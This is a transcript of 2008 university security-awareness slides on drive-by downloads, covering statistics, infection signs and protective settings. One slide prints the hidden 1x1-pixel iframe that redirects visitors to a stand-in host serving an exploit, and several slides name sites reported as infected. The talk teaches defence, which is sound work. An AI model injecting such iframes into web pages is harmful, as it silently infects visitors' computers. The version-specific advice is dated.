Protecting Yourself On-line Carol Taylor Skye Hagen Assistant Professor Asst Director Computer...
-
Upload
jody-melina-greene -
Category
Documents
-
view
218 -
download
0
Transcript of Protecting Yourself On-line Carol Taylor Skye Hagen Assistant Professor Asst Director Computer...
Protecting Yourself On-line
Carol Taylor Skye HagenAssistant Professor Asst DirectorComputer Science Office of Information EWU Technology, EWU
1QSI Conference August 26-27, 2008
QSI Conference August 26-27, 2008 2
Overview Security User Responses Motivation Drive-by Downloads
Defining the problemExamplesRecommendations
User Survey
How many people use Anti-virus? Do you keep it up to date? How many people use Spyware programs? Do you use firewall programs?
Windows Firewall, Comodo Firewall Pro (others)
Do you back up the data on your computer?
QSI Conference August 26-27, 2008 3
QSI Conference August 26-27, 2008 4
Motivation
Why should you be concerned with Web security? I only shop at legitimate sites, I don’t ever visit
sites with questionable content Is that enough to keep you safe? That’s not enough to keep you safe in the
current Web environment Surfing regular e-commerce sites can infect
your computer
QSI Conference August 26-27, 2008 5
Motivation
Statistics show that Web security is getting worse ScanSafe reported a 220 % increase in the
amount of Web-based malware over the period between 2007-2008
The volume of backdoor and password-stealing malware blocked by the firm increased by an order of magnitude
855 % between May 2007 to May 2008
QSI Conference August 26-27, 2008 6
Motivation
A website infected with malware is detected every five seconds (2008) That represents a dramatic increase over the
last 12 months Websites poisoned with malware capable of
infecting visitors' machines are being discovered at a rate of 16,173 per day Three times faster than in 2007
http://www.reuters.com/article/pressRelease/idUS120735+23-Jul-2008+BW20080723
More Motivation
Antivirus firm Sophos found that more than
90 % of web pages capable of spreading Trojan horses and spyware are legitimate websites Recent infected websites include those of ITV,
Sony PlayStation, golf page on the BBC site, and a variety of other commercial
Blogspot.com, the blog publishing system owned by Google, was found to be hosting two per cent of the world's web-based malware in June 2008
QSI Conference August 26-27, 2008 7
Motivation Summary
The threats are real!!!! The Internet is an amazing collection of
Entertainment, knowledge, social opportunities and goods but …
The Internet is also a mirror for society Crime, fraud, personal safety and privacy threats
are real, just like in the real world The main difference is that the threats are hidden,
risk is not obvious You must protect yourself from these real dangers
QSI Conference August 26-27, 2008 8
Drive-by Downloads
This attack takes advantage of known vulnerabilities in browsers and operating systems
In a drive by an unsuspecting user (you) downloads and installs software without ever knowing it while they surf the web Can happen when you agree to install browser plugins,
run a Java Applet, or Java Script or launch Active-X applications
However it can also happen without you doing anything There are Web pages modified with code that redirects
visitors to another site infected with malware that can break into your PC, without you even realizing it
QSI Conference August 26-27, 2008 9
Definitions
Active X Control or Active X: A program, developed which can be embedded in a web page or downloaded from a web page and executed from within the browser itself. A browser must support ActiveX controls for this to work
Javascript: A scripting language, based on both Java and C++, used to create code that is commonly embedded into HTML on web pages for enhanced functionality For instance validation of user typed input on a
form10
Definitions
Java Applet: An applet is a small program, usually embedded in a web page, which can perform a number of duties such as playing audio or video clips and querying a database. These programs are normally written in Java
QSI Conference August 26-27, 2008 11
Drive-by Downloads
Unsuspecting users are victimized by simply doing what they do hundreds of times each day Visiting a Web page
Then, while you browse content normally, A computer virus or Trojan horse program is
silently installed
QSI Conference August 26-27, 2008 12
Drive-by Downloads Drive-by downloads are not new, but criminals
have seized on the tactic lately because their success rate with traditional e-mail viruses has tapered off
Avoiding e-mail viruses is not always easy, but more likely as long as you follow clear rules like "don't click on any attachments" But drive-by downloads are much more
sinister No user interaction is generally required
beyond opening an infected site in a Web browser QSI Conference August 26-27, 2008 13
Scope of the Problem
http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html
Google crawled billions of Web pages and found … More than 3,000,000 unique URLs on over
180,000 web sites automatically installing malware
14
Graph is % of daily Google queries that contain at least one harmful site in 2007
QSI Conference August 26-27, 2008
Drive-by Downloads
How Web Sites get infected One injection technique, gain access to the Web
Server that hosts the site Attacker injects new content to the compromised
website Typically, injected content is a link that redirects
visitors of these websites to a URL that hosts a script crafted to exploit the browser
To avoid visual detection by website owners, attackers use invisible HTML components
e.g., zero pixel IFRAMEs hide injected content
15QSI Conference August 26-27, 2008
Example of Web Server Compromise – “Italian Job” 2007- Online criminals launched a Web attack that
compromised thousands of legitimate Web sites Infected Web sites contain HTML "iFrame" code
that redirects victim's browser to server that attempts to infect victim's computer
Internet Explorer, Firefox, and Opera are vulnerable
Keyloggers and Trojan downloader program found on compromised PCs so attackers can monitor victim's activity and run other unauthorized programs on the computer
“They can turn your computer into anything they want”
http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html 16
Example of Web Server Compromise – iFrame Example Following code is injected into web pages Size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the
visitor of the site unless the person looks at the source code:
<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>
Above server, remote.example.com index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer
Executable was recognized by about half of anti-virus tools as a spyware trojan
17
Steps for Drive-by Download
18
Browser gets redirected by hidden link, remote.example.com
Downloads and executes hidden malware, from index.html
http://research.google.com/archive/provos-2008a.pdf
QSI Conference August 26-27, 2008
Drive-by Downloads
How Web Sites get infected Another common injection technique
Use websites that allow users to contribute their own content
Postings to forums or blogs User contributed content may be restricted to text but
often can also contain HTML such as links to images or other external content
Adversary can simply inject the exploit URL without the need to compromise the web server
QSI Conference August 26-27, 2008 19
Example of User Contributed Content Compromise - Blog WordPress is the most popular software for
blogs Should use the the current installation of
WordPress (WP) Version 2.5.1 There is an increasing number of blogs, all
with version WP 2.3 and earlier Getting “hit” by the well known iFrame exploit
that infects website visitors with a trojan download
Advice from Marc Liron – Sitebuilder proQSI Conference August 26-27, 2008 20
Example of User Contributed Content Compromise - Blog Author, Marc Liron had trouble loading a site from
well known Internet Marketer, Stu McLaren So, he attempted to access Stu’s blog (June 2008)
http://myideaguy.com/blog/ (DO NOT GO THERE) A few moments after visiting the section:
http://myideaguy.com/blog/category/products/
(DO NOT GO THERE) His installation of Kaspersky Security Suite
ALERTED that a TROJAN infection trying to infect his computer!!!
The culprit was: Trojan-Downloader.HTML.Agent.ishttp://www.marcliron.co.uk/sitebuilditreview/ stu-mclarens-blog-gets-infected-by-hackers
21
Google Flags Malicious Sites
Site has repeated problems http://www.wowstatus.net/
World of Warcraft site Google flagged it as hosting malicious content http://www.google.com/interstitial?url=http://www.wowstatus.net/
One way sites are being flagged to alert you However not all sites are flagged ….
QSI Conference August 26-27, 2008 22
Signs You are Infected
Spyware alerts after you have visited a site See a program pop up that you never loaded
Asks you to do something (don’t do it!) Web browser’s home page changed Browser has new book marks Pop-up window advertisements Unusual files on your computer
QSI Conference August 26-27, 2008 23
User Behavior
If you think you have been infected, Don’t say yes to anything Close pop-up windows that appear You get an offer to help you clean up your
computer, remove spyware As one researcher put it “I rob you, then I run back and offer to help
identify the culprit that did it” Not too helpful …
QSI Conference August 26-27, 2008 25
Example Problem Pop-UP
QSI Conference August 26-27, 2008 26
If you click "Yes," spyware is installed.
Note the presence of a security certificate is no guarantee that somethingis not spyware.
Protection from Drive-by Downloads Keep Operating system patched and up
to date Turn on automatic updates for OS
Windows XP Settings, Choose Control Panel then
System Open the System Tool Turn on Automatic Updates
QSI Conference August 26-27, 2008 27
Protection from Drive-by Downloads Use the latest browser, Firefox, IE Explorer, Opera Keep browsers patched and up to date
Turn on automated updates for Browser Firefox, current version, 2.0.0.16 and automatic
update is enabled by default But to see the option type, Go to tools > Options > Advanced > Update
IE Explorer is up to version 7 Was an automatic update by MS Use this latest version!!! Has phishing protection built in
28
Protection from Drive-by Downloads Install several programs for removing spyware and
viruses – These are free!!! Adaware SE
http://lavasoft.com/single/trialpay.php Spybot Search and Destroy
http://www.safer-networking.org/en/index.html AVG – virus program
http://free.avg.com/ Avira AntiVir – Another Virus program http://www.free-av.com/ http://www.viewpoints.com/Avira-AntiVir-Personal-Edition-Classic-
review-5ed2029
Protection from Drive-by Downloads Harden your Web browser
Medium security is not good enough Set it to higher
Disable active scripting or have it prompt you If have problems, add sites to an accepted list
QSI Conference August 26-27, 2008 30
Firefox IE7
Open the “Tools” menuSelect “Options”Click “Content”.Click the check box to the left of “Disable JavaScript” so that a tick appears.
Open the “Tools” menu. Select “Internet Options…”, Click the “Security” tab. Click the “Internet” symbol (a globe)Click the “Custom Level…” In the Settings list, scroll down to “Scripting”. Under Active Scripting, click “Disable”
Protection from Drive-by Downloads Another way to protect yourself is by
virtualizing your Web session Using ZoneAlarm’s ForceField The virtualization technology in ForceField forms a
"bubble of security" around the Web browser so that all unknown or unwanted changes from drive-by downloads, are made to a virtualized file system Disappear completely once the user is finished
surfing ForceField's virtualization claims to offer additional
security by protecting the browser session from any malware that might be on the PC
http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp
31
More protection using a free browser toolbar Haute Secure
A company started by Microsoft employees Produce a free toolbar supposed to protect
you from bad web sites Seems to be a good product Can try it and report back
http://hautesecure.com/solutions.aspx
QSI Conference August 26-27, 2008 32
Summary Internet is a scary place Great place to hang out but … Dangerous too Ignore Security? Sure ….
Result is your computer can be used for spam or to commit crime
Your sensitive data can be compromised You will be a victim of theft Your computer may be unusable
Pay some attention, get or buy security software … Security is a process!!!
33
Resources
EWU Security Awareness Site http://www.ewu.edu/securityawarenessSANS Reading Room – lots of technical papers http://www.sans.org/reading_room/Drive-by Download Video http://video.google.com/videoplay?docid=-3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Drive+by+download+%2B+watchgaurd&hl=en
StopBadware.org – search for bad websiteshttp://www.stopbadware.org/home/clearinghouse
Re-installing Windows XP – last resort http://www.pcworld.com/article/129977/
how_to_reinstall_windows_xp.html34
35
This presentation can be found at
http://www.ewu.edu/securityawareness
My email: [email protected]
Questions